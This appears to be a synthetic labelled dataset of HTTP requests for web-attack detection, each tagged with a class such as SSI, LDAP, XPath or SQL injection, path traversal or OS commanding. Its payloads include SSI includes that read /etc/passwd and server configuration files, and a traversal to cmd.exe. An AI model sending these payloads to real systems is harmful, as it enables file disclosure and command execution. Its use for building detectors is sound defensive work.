Content-Type: application/x-www-form-urlencoded
Host: www.ljko1rhx.it
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: gb2312;q=0.8
Accept-Language: let-eseon;q=0.9, n4tte-nvkaa, open-tn;q=0.4
Cache-Control: max-age=7444
Cookie: 3a=<!--   #include  virtual="c:\winnt\system.ini"  -->
Date: Mon, 27 Feb 06 17:50:20 CET
ETag: "DltvQgFt93QHWJr."
If-Unmodified-Since: Tue, 26 Feb 08 16:55:15 GMT
If-Range: Tue, 07 Jun 05 09:17:22 GMT
Referer: http://www.osiu.uk/yE7s/iooGid/tk1dt/nZrkyi/ebmy.rar
TE: deflate,trailers
User-Agent: ep0Wet (raHYib; ny.0Y8Fb)
Via: FTP/5.5 www.Fstahbhn.jpg, 0.3 221.201.220.66:27829
Upgrade: Aois/8.6, etuil/9.4, htodTe/0.4, 6mere/5.8, nolnt/1.6
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nhn=gsmrLh8ylo&o69asd=PirSadeleteO?te&Wwlink@c=3|r&6xl5oowipic=HarO&dOaolIt9h2hn=80109053&hhTl3h5aaa=Ahere lh&Dal5awsnc=802418

End - Id: 40721
Start - Id: 48836
class: XPathInjection
GET /tiptRsrswsC/1ZwX-xZ/e@6gPyavV3aJtzh2i/970CGmailCKxm/rEt7tHDhlcKalHb/xPixkVHO1a4c./icQOp@f.shtml?nutolflnr1nhrt1=hhcV8e&rie73lrkjtr=oYThSGp2q&Aimpdiwy4avur=+aoo&ydot=4++or+++++1%3C++rd%2Ftooo1%2Fnirtw%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D1%5D+or+8510%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&3ktrblciiYnszr=jouf+%3Aofreix&mflZx3PtmpzZU6=36543&thlo=pLwRGr&CKdocument_u6@hAF.=9&hrRs=sk_iM HTTP/1.1
Host: www.tfacOyst.com:9
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-turkish, x-mac-ce;q=0.2
Accept-Encoding: 
Accept-Language: oa-thEhg9S;q=0.7
Cache-Control: no-transform
Client-ip: 23.135.69.55
Cookie: 6lanoEgce5tee=ocinullt;liu7=%;mwo=Lm
Cookie2: $Version="84"
Date: Sun, 19 Apr 09 12:40:40 CET
ETag: W/"JftVl8GYxSRSP6hMl"
Expect: 100-continue
From: 18kll@eaes.it
If-Modified-Since: Fri, 21 Nov 08 06:18:53 GMT
If-Unmodified-Since: Mon, 09 Aug 04 10:37:43 UTC
If-Match: *
If-None-Match: "MrwIIj4t5uVwxU8o"
If-Range: "a94BlaFi9D5pQ4_"
Max-Forwards: 545
MIME-Version: 9.5
Pragma: ezgGepae='Dpjhgsl'
Proxy-Authorization: NTLM bmVpVHByZTAwRm5lZWNvZWIwc2hyU2pzQW5wZmV0cmVzZW9yZWFlZ2FPZXIw
Authorization: NTLM ZWRUNXNpbzJ0amVzc2RrT3llcmU5bFNvaXRuZVNhZU5lb3RiTWFpZ2ZidGJ0ZQ==
Range: -970304,-74
Referer: /enil.shtml
TE: trailers,gzip;q=0.4
Trailer: Accept-Charset
User-Agent: yospfm (fN@LVeafY; d9xr1hp; dK9Fw8o; yi8wexReMY)
UA-CPU: StrongARM
UA-Disp: 5906,9544,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0867x2824
Via: n34t/6.4 99.152.253.81
Transfer-Encoding: gzip
Upgrade: qdiue/5.0
Warning: 056 www.f4xe1oNm.htm "ehiaia" "Mon, 17 Nov 08 12:21:14 CET"
X-Forwarded-For: 54.250.164.51
X-Serial-Number: 177199337529573688
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 48836
Start - Id: 38127
class: LdapInjection
GET /oRxknGqVf2ZayQeqKw/rtoeieawa7aep/iblbb/8F/nshtdaa/ZjfJfcX_xWhome3i/dwy8gbfSelft/wtac9Oihoishaoo/brdp0qhL/i0p5Qb.ZAXD3/eii@P7oX0wUAG0XWr/4v4d44ok@vW2.js?de97tlte0=5165672227&ttw=%29++++%28++++%7C+++%28displayName%3Dhad*%29++%28name++%3Dhad*++%29%28mail%3Dhad*++%29&tZUT4=9468&ssaan=42&bossqteha56tad=teip&asslwwtahEtE=92&m@6GD-imglsen2C=ezLc%40munw&xina=ojIu7af&r8tORtt=rw&2utfrio8rO=ece&r2qrp7a=fod&irglYtyemnR=9267&5srocsin2m7g6=system+&tudRu=53792 HTTP/1.0
Host: 104.129.193.172
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 7ymtcA-umefeh, mdcoe4i-e4Rl;q=0.4, oectrmEe-nxagogi;q=0.8, MIu-ylnihnea;q=0.4, han2t-n6d2in
Cache-Control: no-cache
Client-ip: 5.162.7.96
Cookie: reied8mritrp8xl=<selectnsriioEdiyhi mhaafrom
Cookie2: $Version="5"
Date: Fri, 10 Nov 06 20:09:15 CET
ETag: W/"XSJy2BP.3@6hcqV.O8h6"
Expect: 100-continue
From: r0roy@hbe7rHPeNd.st
If-Modified-Since: Thu, 28 Dec 06 13:26:15 UTC
If-Unmodified-Since: Mon, 09 Jun 08 05:28:56 CET
If-Match: "O@KraQ34@7QxRmFDaSi"
If-None-Match: *
If-Range: Wed, 18 Mar 09 23:25:26 CET
Max-Forwards: 6
MIME-Version: 2.1
Pragma: ub8rreh=swt8a
Proxy-Authorization: ttA2f lstyphu=yxiY
Authorization: Digest algorithm=MD5-sess
Range: 17768-5
Referer: /nttlyyli/7esbttI/ijsp/t9htietr/hiktsn.mpg
TE: chunked,chunked;q=0.3
Trailer: From
User-Agent: elbytwuouUetdhnln
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 9991x6291
Via: HTTP/6.4 158.85.144.68
Transfer-Encoding: deflate
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 380 www.gtcrerT.html:4591 "ksmndhegEt2od" "Sat, 04 Oct 08 01:21:24 GMT"
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38127
Start - Id: 48937
class: XPathInjection
GET /swgeta50URLZ/dz09h29/ogwV6o@BF/yxX2y/nteb/o8rq9np/y2httpTe/tcm_iJMh/sooeoaNmioyeal1e/omtdceotsriMehiahr7.jsp?rTidcsioe=3++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+942%3D HTTP/1.0
Host: www.htaopkhe.be
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: s2dt-o0rdwn, otldis3-reg6;q=0.7, elltn2h-lwt;q=0.7, yIea6ym-3gynosro;q=0.0
Cache-Control: only-if-cached
Client-ip: 163.68.137.81
Cookie: k5rmahaeicse2=03;Loiteb=gfntit3lci;msekzCrtrekbcei=6bijeBanatOmf;B_log97DJ_=tr 7a4nr;9ufromservices6q=215675835;jt=Ralm esdahh$7%ieh
Cookie2: $Version="549"
Date: Thu, 10 Nov 05 11:00:55 GMT
ETag: W/"l6bPu21yTmotN@40hzb"
Expect: ghd27=dnsedlo;desEue
From: 11ria@soa2e.be
If-Modified-Since: Thu, 28 Sep 06 21:24:17 UTC
If-Unmodified-Since: Fri, 17 Nov 06 16:47:38 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 12 Dec 08 08:38:24 UTC
Max-Forwards: 340
MIME-Version: 6.7
Pragma: d='todogc'
Proxy-Authorization: Digest response="bDD9738c8b7dB2ba67BAcc1DF2f5adcE"
Authorization: Basic dDhhZms6ZWU0aTl0
Range: 326-470558,-0121
Referer: /nlnrnml/sld3stiZ/749fde7.mpeg
TE: trailers
Trailer: Proxy-Authorization
User-Agent: ik8oV7bSv http://www.tinuaa.de
UA-CPU: 68000
UA-Disp: 3657,5420,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 508x349
Via: FTP/0.4 www.aycmt5e.js
Transfer-Encoding: compress
Upgrade: tgxf/7.7, hudO/8.7, kEn/1.6, souT/0.8
Warning: 129 www.iLdnews.tiff:319 "mv1aiMea" "Wed, 18 Oct 06 24:35:06 CET"
X-Forwarded-For: 9.137.128.106
X-Serial-Number: 6293000915488
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48937
Start - Id: 35460
class: SqlInjection
PUT /_wPacceptJk8access_logLA.OX/aSVzGD_1JbDxS@Wf1z/fnc2rma6tmfceaStoVAn/odnrenf7roocJeisU.mdb? HTTP/1.1
Content-Length: 96
Content-Language: nTh7suds,teq8,snt
Content-Encoding: deflate
Content-MD5: YWhlSE9ybGEwYW9zdW1qMw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 16 Feb 04 08:54:08 CET
Host: www.pA8au9.st
Connection: ehow
Accept: text/*;q=0.4
Accept-Charset: *;q=0.6
Accept-Language: e6ew-eaa
Client-ip: 224.0.89.137
Cookie: rsn2e16i2aS8=t dltw:neot;mslhlureot=545;dEicKrrsdtctd=' +  (    SELECT TOP  1    6tvSLorU     FROM  iIn9o3)   + ';antls3licn=97590674;jiritlra=nmeperlidr1ietfhlib;ea=ao
ETag: "xolVUWs5P4OEy9zc"
If-Modified-Since: Thu, 14 Sep 06 01:00:59 UTC
If-Match: *
Pragma: no-cache
Referer: /ltncea/tSihna.swf
TE: gzip,gzip,trailers
User-Agent: Mozilla/1.7 (X11; U; Open BSD i386 0.7; xs-si; rv:7.1.6) Gecko/82685559
Upgrade: i8p/9.1, EEc4/6.1

nmn=7ibmNeetonEail&l1mOo=ddxTb&e56u=65874&te=da&jz&oepunan=la7oinclude/rb0td&geos=Lebetweene

End - Id: 35460
Start - Id: 44728
class: PathTransversal
POST /RwoeshIpto2cmbANhOch/a3Qntteoot/aWYs2whEu6.jHo0aNI/hNtngeaLahnoyis/mKTlzPv/avj/tYfmra/tTfebgldtil9iz7W0tls/g_TOe0sK_.R6U/m1Cb_i_B0t9i/ioljx59rianb2k/2git.htm? HTTP/1.0
Content-Length: 85
Content-Language: coeedt
Content-Encoding: identity
Content-MD5: dWt0YjFtYm4yZnJjV2FCeg==
Content-Type: application/x-www-form-urlencoded
Host: 51.231.110.86
Connection: close
Accept: application/*;q=0.4, image/*, application/x-tar
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: irSErva5-whsieudt;q=0.2, 8-dHgtin, rt7OSDr-hyg, e3a-vnekO
ETag: "lqvKAqY49XFL5YzIwybJ"
If-Modified-Since: Sun, 16 Nov 08 02:07:38 GMT
If-Unmodified-Since: Thu, 17 Nov 05 05:04:24 UTC
If-None-Match: "e9aWL5jYPyLA.bsWF-"
Max-Forwards: 4
Pragma: no-cache
Referer: /eixtts00/tpeua9Mt/lnTclzo/Gs3wehp.nsf
TE: chunked;q=0.0,trailers
User-Agent: Mozilla/5.7 (compatible; fnn7q; SunOS sun4u; b99iofqy; h6t0cAy; jTghedDI)

spdtaEe=smeta&in=150&cnoo=collection( file:///c:/sss/Inhrwsa.xml  )

End - Id: 44728
Start - Id: 48895
class: XPathInjection
GET /wdtle3fe/xItt-KwXw_5zbE/r1iRena/7bH_Y3@JfJhojad50a/enali/XCF.mspx?BJ7tv=033963826&bn2oAladrohet=67&tsar4o6i3o=ioLlfhrmblaannto&waohsnds=tU%2Baccess_log9daX&ses=96&eaebSd=1+++++or++Dokuti%2Fm8h6%2FgnIee%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D08%5D+++or++05%3D&ehaae4eofthh=n%7E&Vemuidx0etgi=tf%28l&ooawNTfz=SEt&wuaipaaaeada=343&OoEEsua=rgt&metnoapuigcsai=JmpateUnlr HTTP/1.1
Host: 142.255.69.97:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: compress, identity;q=0.6, deflate
Accept-Language: *;q=0.3
Cache-Control: xstl4Ixs='edy'
Client-ip: 78.151.63.45
Cookie: dsduebfp=70;ERcoiaidaatfnm=34960125
Cookie2: $Version="62"
Date: Thu, 18 Aug 05 03:17:29 GMT
ETag: W/"_ldfV7Hi7T2yZQfxA"
Expect: Odnyhn
From: ge7m@nttgt.gov
If-Modified-Since: Wed, 12 Jan 05 15:57:33 GMT
If-Unmodified-Since: Thu, 16 Mar 06 18:09:28 GMT
If-Match: *
If-None-Match: "dNS.WFfdXF@MtTF1Zi"
If-Range: Fri, 30 Oct 09 12:39:13 UTC
Max-Forwards: 01
MIME-Version: 6.9
Pragma: inlmGhgD='et9s'
Proxy-Authorization: NTLM bWFzZmV0ZWV0N3FlZWl3c2Fsa3NucmNodnNUeVJpcnJldEU5MXU=
Authorization: Basic ZTZhZTo1dXRvZHBh
Range: 87-22
Referer: /oobdtli/aDBhpse/lmdeot.wav
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/6.7 (X11; U; Linux i386 5.3; hc-ab; rv:8.8.6) Gecko/19100573
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 978x515
Via: HTTP/9.4 76.89.248.87, 6.1 151.248.15.54, HTTP/1.9 www.triNseen.shtml:84338
Transfer-Encoding: ow1d
Upgrade: wagnk/0.9, aebao/4.3, 7ip/5.1, ttd/1.5, iI1eI/9.7
Warning: 766 www.wbdsi.gif "iiitgc4re" "Thu, 08 May 08 03:06:26 CET"
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 981784
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48895
Start - Id: 37474
class: LdapInjection
GET /TX7IbY_9pKnjL@window.open/eMdTf8muVh9C/dz5Oinow5.exe?rshiiniolciL=jat%40eq3hunionho&itxLebhbyo=Rx+n&eahniEeenn=6 HTTP/1.1
Host: 0.192.35.224:97046
Connection: keep-alive
Accept: audio/*
Accept-Charset: iso-8859-8-i;q=0.1, windows-1255
Accept-Encoding: 
Accept-Language: f-nwsos, E-t, e-tiwaa;q=0.7
Cache-Control: no-store
Cookie: -2MZwvphpMOwp-=118;kf8ohebI=hnr)(  | (rloif=*);ia7KNconnectuKhQC= rnciihWsi'nph-f~S%;e4lqgh=>%rpa
Cookie2: $Version="9"
Date: Thu, 06 Jul 06 10:55:14 CET
If-Modified-Since: Wed, 01 Jul 09 12:18:20 CET
If-Unmodified-Since: Fri, 26 Sep 08 09:05:57 CET
If-Match: *
If-None-Match: *
Max-Forwards: 8
MIME-Version: 5.3
Pragma: dyf4Rg='shas'
Authorization: NTLM MTJzaXVzcERlZWQzbHQwZm44ZXRlZjByNmEyZW1jc2FkaGJzcDlRdGxibHRp
Referer: /W2itn2/NaihhMtr/vl4eaaf.php
TE: deflate;q=0.2
User-Agent: loegin2One (tlU77zoo; cj_mn3j; iPk-cLDJ; tP8f4U8x4x; iP8-dVTdh)
Via: g0n1/8.7 238.15.101.7, 9.9 www.eraz.jpg, FTP/9.5 www.7O3P.htm
Transfer-Encoding: compress
X-Forwarded-For: 85.93.81.59
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37474
Start - Id: 39643
class: SSI
GET /ionxcuwynahxheh/iIzTC7tYKN-XDI1u/KLtselectc/txA/fIo9.l.kyk/slllUdyisqser1Rqce/itb7rbno/k1k@APM3HyKIpwindow.openc/GUfBX/ttelebaldni8olttnin/loeesracuMi.sh?rmatdnxo=tEhr+8bgc&sWie4oihFnntI8=oIdm3man4dsy6u4z&tmp9xp_Nboot.inifGK=%3C%21--++++%23include+++virtual%3D%22%2Fetc%2Fpasswd%22++--%3E&PetW=8042&sdennzu1ie=-nqi5locationo&rhrrap9igjaonr=%3ETt8eRautoexecsio&ohohjehtvn=oSopenO&moDDuTtta=72198300&vxtorf=7%29dawindow.openoba&n67bdjnT=84851993&ep1=n9EEmrxMCu&red=+e&O7SrqCNL=55&aw=ue0enAns7ow HTTP/1.1
Host: 68.81.65.17
Connection: E7disavd
Accept: video/mpeg, audio/*
Accept-Charset: *;q=0.9
Accept-Encoding: deflate, deflate
Accept-Language: *;q=0.0
Cache-Control: min-fresh=4
Client-ip: 39.207.20.202
Cookie: lgshtvo0=dzsu;stnp6ld=88865580;etete=ndrcpbino0;TaIhe=90265082
Cookie2: $Version="3"
Date: Wed, 21 May 08 15:45:01 UTC
ETag: W/"A2.v71CkZHD7@G96Mx"
Expect: 100-continue
From: w3fee@ThEishEn.net
If-Modified-Since: Tue, 06 May 08 07:20:35 GMT
If-Unmodified-Since: Fri, 20 May 05 08:22:40 UTC
If-Match: "psnYA6HWSRX2ITrBCru-"
If-None-Match: "IW37ej9JezZMgRmh"
If-Range: *
Max-Forwards: 2149
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic MklyaW46dHI1dDV6b3A=
Authorization: Digest response="7990c8aD25A18B6bFB7a1D1BBAdb1e1f"
Range: 8390-9808,98603-966384,604007-
Referer: /yt1ao/gddetue.sh
TE: trailers,gzip;q=0.0
Trailer: Authorization
User-Agent: Mozilla/3.3 (Windows; U; WinNT 9.2; ie-ia; rv:1.4.3) Gecko/33942230
UA-CPU: PowerPC
UA-Disp: 749,540,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2034x6396
Via: 9.8 www.nxdsog.jpeg:792, 8.1 179.52.196.3, 6.8 21.9.135.254:153
Transfer-Encoding: compress
Upgrade: o7s/5.6, dipl/2.7
Warning: 233 www.tttteg.htm "ttmdenotsrmsagg2nt4" "Mon, 21 May 07 21:20:21 CET"
X-Forwarded-For: 209.99.255.194
X-Serial-Number: 659531112
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39643
Start - Id: 37621
class: LdapInjection
POST /et9o2aifebeu/haL7EN.w_TCwue4/ihAt/hakc1Cro1Tts/F2Hwhere6XqMEjhRB.shtml? HTTP/1.1
Content-Length: 333
Content-Language: cnbtEd
Content-Encoding: deflate
Content-Location: http://dswcin.uk/4Gs5/lndahye/yusut/XosqvEb/soek.txt
Content-MD5: b2VMb3JnZW11c3JsaXp0NQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Oct 09 16:07:32 GMT
Last-Modified: Mon, 09 Nov 09 22:55:35 GMT
Host: 233.1.120.211:5
Connection: keep-alive
Accept: application/postscript;q=0.2, application/*
Accept-Charset: windows-1255;q=0.9, x-mac-arabic, iso-2022-kr;q=0.0, euc-jp
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 109.56.227.8
Cookie: ySdslashnn0h=eoLUs;e4oayecnthkuswe=0398;2wwa=6215565
Cookie2: $Version="0"
Date: Mon, 21 Aug 06 08:48:40 CET
ETag: W/"DddEOWrjiiTyulSVN@"
Expect: 100-continue
From: Isa0nt0@Tiskeey.com
If-Modified-Since: Thu, 28 May 09 02:32:06 UTC
If-Unmodified-Since: Wed, 20 Apr 05 23:58:15 GMT
If-Match: "vHrB8Jr0Qpu1@qmn"
If-None-Match: *
If-Range: Fri, 03 Sep 04 12:37:58 UTC
Max-Forwards: 9
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest username="pitaah"
Authorization: Digest algorithm=MD5
Range: -6153,297-,439-473
Referer: http://www.aoBge.st/Rnlaei/silrrs.gz
TE: trailers,chunked,gzip
Trailer: If-Modified-Since
User-Agent: enmP1ub (2rV4VjVc2@; r_YzC_MGF; aTseDY)
UA-CPU: MIPS
UA-Disp: 2548,1743,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4356x362
Via: 1.2 www.tdEnl.tiff
Transfer-Encoding: compress
Upgrade: KhGnr/5.3, xofo/5.0, aRe/6.6
Warning: 019 53.184.51.92 "gqnaoerdito" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 220877773
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ccehenuE=)  (   |  (displayName=had*)    (name    =    had* )(  mail=had*    )&i3=71&3Gx-Od=ikpndh7d/bgsoundtnfx&oeaoeqvar=734400246&alnu7teNxl=Eeii&pouenatse=mng;prEprocessing-instructionygewherec|&IU3jXYTuElsst=48801&1tereo14se37t=hhZN&a6=gt8vjXaF&eebsopamoe=9425&3mpsoemen=aa\:ik &ia=n pssnhs8rin

End - Id: 37621
Start - Id: 39729
class: SSI
GET /7zGd9t/Heha9ees9a/2xcocrtlAet2eompods/aanDguoot5s7ioTwhme0/luQ7LWESC/eZW3AutoskCn/dvrvarshwrNtainMdl8h.jpeg?safvnih7omha=%3C%21--++%23include++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++++--%3E&ueq=439&gwt3a530Mtlx=7&twostb3sgdtkhtd=sysse1v3hhut2i HTTP/1.1
Host: 24.36.201.196
Connection: close
Accept: audio/*, audio/x-wav, text/*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.4, identity;q=0.1, identity;q=0.4
Accept-Language: *;q=0.0
Cache-Control: max-stale=5552
Client-ip: 55.223.250.116
Cookie: ktnna=5@JHgyCGc
Cookie2: $Version="7"
Date: Thu, 24 May 07 23:39:56 UTC
ETag: "94bUe-wM@qJ1fI3O"
Expect: tonsult
From: iltkt32@r7Muj.it
If-Modified-Since: Tue, 23 Aug 05 15:39:37 UTC
If-Unmodified-Since: Mon, 24 May 04 12:13:56 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2126
MIME-Version: 4.8
Pragma: nh9eh=aWi
Proxy-Authorization: Digest nc=CBADdAaC
Authorization: Digest cnonce="o0Rwteea"
Range: -58,-7,-12255
Referer: http://www.noh5ub.com/aowIgvfn.wmn
TE: deflate,trailers,trailers
Trailer: Host
User-Agent: Mozilla/2.9 (Windows; U; Win 9x 5.9; yi-mO; rv:2.8.3) Gecko/69682124
UA-CPU: x86
UA-Disp: 9987,6027,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 292x7256
Via: 5.5 248.58.121.185, 0.5 235.82.229.117, 6.6 www.ten5.js
Transfer-Encoding: identity
Upgrade: dhHa/1.3, bqt/4.5, per/1.9, eoto/7.1, xle/6.5
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 51.221.13.87
X-Serial-Number: 878025809262
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39729
Start - Id: 40715
class: SSI
PUT /GBdocumentzDallc@Zw/tvNaAUy/9ri06LZPcbTVsAd7/h6T7bHGcmI/aipdAet/satstat/7qHo8SD/l6kkNvl.html? HTTP/1.0
Content-Length: 151
Content-Language: iwuppz,Oeie,hnlo6ltc
Content-Encoding: deflate
Content-Location: /NidEoor/eO1bef/ntmrs.jpeg
Content-MD5: aDJUbmJzZTh3bjdYdWFyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 12 Apr 06 24:27:53 UTC
Last-Modified: Thu, 20 May 04 22:29:49 CET
Host: www.ufilstzz.biz
Connection: keep-alive
Accept: application/rtf;q=0.2
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: 6oy2seia-hfjEs;q=0.3, aGa0-ex1ppvyu, shdzta-e7q;q=0.7, 4xioqqsl-bs;q=0.6, o-eb;q=0.7
Cache-Control: no-store
Cookie: dgpdOesdmitea=<!-- #include     virtual="d:\windows\autoexec.bat"    -->;db5enfzLueee=wi8rdu47r80i5
Cookie2: $Version="5"
Date: Mon, 14 Jan 08 14:11:06 UTC
Expect: 100-continue
From: rFatjm@ttekdoaeo.fr
If-Unmodified-Since: Fri, 04 Mar 05 02:39:47 CET
If-Match: "OJRFzkDPUT-pZmP4"
If-Range: Mon, 04 Sep 06 20:43:26 UTC
Max-Forwards: 46
MIME-Version: 1.5
Proxy-Authorization: Iroo tPerr=hrIhA
Range: 425-801463,342319-,-554006
Referer: http://www.w2zet.gov/rn3uDiaa/nsgass.msf
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: pbusagv
Via: 7.0 220.126.113.39, acp/5.8 31.20.13.82, 8.3 www.r6mlan.gif
Transfer-Encoding: deflate
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~

3dCk6Zqq6= IanuotipS2havingao=&lsnrtoa=taOrouAong&cReiwthSeaes=02963&sonsoeYetehgr=009064&nlteeClnXii=o]e&5veuconofar=7830198&nH=ns<ep7'20apmhx

End - Id: 40715
Start - Id: 39707
class: SSI
GET /98.css?mtc8hhop=%3C%21--+++++%23include+++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++++--%3E&Apbx=bsd HTTP/1.0
Host: www.ErlAnnita.net
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: dtAe-st;q=0.1, tcit-iie, h2-edeeg2h;q=0.9, EcaXtoh-o;q=0.7
Cache-Control: max-stale
Client-ip: 32.112.118.22
Cookie: aTemenhlf5s=559;tue00tfc7a=oammLD-B7hN_;b0hiw=sLj;ini=ici4oSnaei
Cookie2: $Version="1"
Date: Wed, 14 Oct 09 20:50:06 CET
ETag: "eQt1lpFUkKACMULNX9"
Expect: bufr=y5wn1
From: en976nr@rtqaia.net
If-Modified-Since: Fri, 22 Aug 08 22:32:42 CET
If-Unmodified-Since: Mon, 08 Oct 07 13:38:52 CET
If-Match: "IvKCUr8qbgb3QHm_"
If-None-Match: "uh3CNwA5vUT1cZe"
If-Range: Fri, 29 Dec 06 21:53:09 UTC
Max-Forwards: 6620
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: mE1df gdtrmo=oh1esyls
Authorization: NTLM Z2MzdHNVcnU0bzVoc0RlZWlvVXdldmFYSXNscWxtZXJpcnVy
Range: 61-,98874-5,222224-
Referer: http://38lnascn.gov/Dwia6ks.dll
TE: gzip,deflate
Trailer: From
User-Agent: Mozilla/2.3 (compatible; Konqueror/6.0; Linux i586; nwpauyl; ghl4drFMb)
UA-CPU: Sparc
UA-Disp: 3264,053,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 893x558
Via: 0.7 195.181.183.129:9457, 1.9 175.111.4.64, 5.1 www.eiPrrn.js
Transfer-Encoding: compress
Upgrade: effn/5.2, ajnt/0.1
Warning: 414 39.123.241.242 "diuAtlysh" "Sat, 05 May 07 01:06:17 GMT"
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39707
Start - Id: 43939
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 244.25.173.179
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: pyts-rtaite;q=0.9, wYrIt-veng
Cache-Control: max-stale=59925
Client-ip: 203.44.173.36
Cookie: 0lTbeepccarme=68476;ubiangqa9=7982;dcoeoenicltmhox=pk=eaccess_loger5D;dxellJn0ae2seiN=5;iH=betweenTMzuenuaararrs
Cookie2: $Version="4"
Date: Wed, 02 May 07 04:49:23 UTC
ETag: "FKkc6IzcbEuCntMpiq"
Expect: 53qdsl=8yhants;n1ncn=wiiOf
From: 1mrsvi@GkweMt.fr
If-Modified-Since: Wed, 01 Jul 09 13:22:08 CET
If-Unmodified-Since: Fri, 09 Feb 07 07:14:19 CET
If-Match: "D2.z7TCFzeJ0kUrcB7SJ"
If-None-Match: *
If-Range: Wed, 28 Apr 10 16:15:48 GMT
Max-Forwards: 78
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: NTLM QWhESWxkZ3lubHNJd3l3eWhkeVJvYWFlb3JtbnBhU2FhZjJlZXp1bm5jZQ==
Range: 080946-24031
Referer: /rmlInq/yrq4l.dll
TE: deflate;q=0.4,trailers,deflate
Trailer: If-None-Match
User-Agent: vtnnAthsjt
UA-CPU: StrongARM
UA-Disp: 9151,3536,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 428x0275
Via: 3.5 www.mfdfo.jpg
Transfer-Encoding: compress
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 327 www.3eSas.css "tdlqjc" "Sat, 26 Jan 08 18:17:22 CET"
X-Forwarded-For: 157.151.213.231
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43939
Start - Id: 37907
class: LdapInjection
GET /OR/ierxhuceo4/iretnoqR/nmdtsTrse2pifrRa/2ipecthhan0waian/OPP/iuig7ety/sock_streamXlOfposition/aEEca/ebt0d3st/Nbiootnt.js?uai5rn=npnlboot.iniaeCu&lgueoOord5=ta&TkiVwE_7=he%5DAantgitsl&te=inevaroegglsfoDge&s8ee=ti%29%28+%7C++%28mrz%3D*%29 HTTP/1.1
Host: 64.190.108.80
Connection: close
Accept: audio/x-wav;q=0.5, audio/x-wav, image/*;q=0.9
Accept-Charset: *
Accept-Encoding: gzip;q=0.4, identity, gzip, gzip
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 206.217.112.201
Cookie: hgshsahfb9dw=ihReti5tsvzjpgb;3proiece=ouUr0@1wtqw;pefisneikeer=dl2as Spar0extmp
Cookie2: $Version="1"
Date: Thu, 25 Sep 08 14:46:03 GMT
